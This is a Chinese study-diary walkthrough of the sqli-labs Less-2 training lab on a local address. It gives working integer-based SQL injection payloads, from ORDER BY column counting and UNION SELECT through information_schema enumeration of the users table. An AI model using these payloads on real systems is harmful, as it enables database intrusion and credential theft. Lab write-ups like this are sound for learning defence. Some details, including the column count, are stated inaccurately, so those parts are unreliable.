sql-lib每日一記_Less2(day2)

  • 2019 年 12 月 16 日
  • 筆記

SQL-Lib_Less2

  • 查看源程式碼

本地環境試驗訪問地址:http://192.168.72.179/sqli-labs/Less-1/?id=1

  • 查詢語句
  • $sql=」SELECT * FROM users WHERE id=$id LIMIT 0,1」;
  • 可以看到這裡並沒有對id進行過濾,並且查詢的是整數並以雙引號閉合
  • 所以可以得知,整數注入可以直接和上面一篇一樣注入,但無需閉合

  • 爆破欄位
    • http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 1 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 2 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 3 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 4(到這裡報錯說明4是最大欄位數)

  • 聯合查詢
    • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,3
  • 發現了上面的三個欄位的輸出位置

  • 爆破資料庫
    • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,database()
    • 得到了當前資料庫為security

  • 爆破security資料庫表
    • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=」security」

爆破users表中的欄位

  • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=」security」 and table_name=」users」 得到了id,username,password 三個欄位

提取欄位中的username和password內容